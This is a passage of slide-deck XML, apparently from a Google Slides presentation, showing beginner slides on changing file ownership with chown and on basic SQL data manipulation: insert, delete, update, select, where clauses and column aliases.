              </a:rPr>
              <a:t>How to change file owner and group ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771625" y="1161750"/>
            <a:ext cx="8170200" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>chown owner:group &lt;file&gt; </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>chown www-data:www-data index.html</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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9" name="Shape 2729"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2730" name="Google Shape;2730;p444"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420275" y="23947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600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DML</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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445"/>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How to insert data in table</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2736" name="Google Shape;2736;p445"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276600" y="1417300"/>
            <a:ext cx="86799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200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO &lt;tableName&gt; (Columns) VALUES (‘Values’);</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO &lt;tableName&gt; (Columns) VALUE (‘Values’);</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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p446"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> data from table</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2742" name="Google Shape;2742;p446"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276600" y="1417300"/>
            <a:ext cx="86799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200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DELETE  FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;tableName&gt; WHERE &lt;SomeCondition&gt;; </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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sp>
        <p:nvSpPr>
          <p:cNvPr id="2747" name="Google Shape;2747;p447"/>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How to update data in table</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2748" name="Google Shape;2748;p447"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276600" y="1417300"/>
            <a:ext cx="86799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200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE &lt;tableName&gt; SET &lt;ColName&gt;=’Value’,.. WHERE &lt;SomeCondition&gt;; </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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448"/>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How to insert data in table</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2754" name="Google Shape;2754;p448"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276600" y="1417300"/>
            <a:ext cx="86799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500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>INSERT INTO &lt;tableName&gt; </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(col1,col2,...)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>VALUES </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(‘val1’,’val2’,‘val3’,...);</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2759" name="Google Shape;2759;p449"/>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How to get records/entries from table</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2760" name="Google Shape;2760;p449"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276600" y="1950700"/>
            <a:ext cx="86799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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select &lt;ColumnName&gt; from &lt;tableName&gt;;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* All Columns</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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4" name="Shape 2764"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2765" name="Google Shape;2765;p450"/>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Where Condition</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2766" name="Google Shape;2766;p450"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276600" y="1950700"/>
            <a:ext cx="86799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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>select * from &lt;tableName&gt; where someCondition;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* All Columns</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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sp>
        <p:nvSpPr>
          <p:cNvPr id="2771" name="Google Shape;2771;p451"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>temporary</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> rename a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>column?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2772" name="Google Shape;2772;p451"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276600" y="1950700"/>
            <a:ext cx="86799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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select &lt;ColName&gt; as &lt;newColName&gt; from &lt;tableName&gt;;</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2773" name="Google Shape;2773;p451"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2296625" y="1526750"/>
            <a:ext cx="4056000" cy="50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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Alias</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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7" name="Shape 2777"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2778" name="Google Shape;2778;p452"/>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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permanently</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> rename a column?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3400">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2779" name="Google Shape;2779;p452"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276600" y="1950700"/>
            <a:ext cx="86799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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
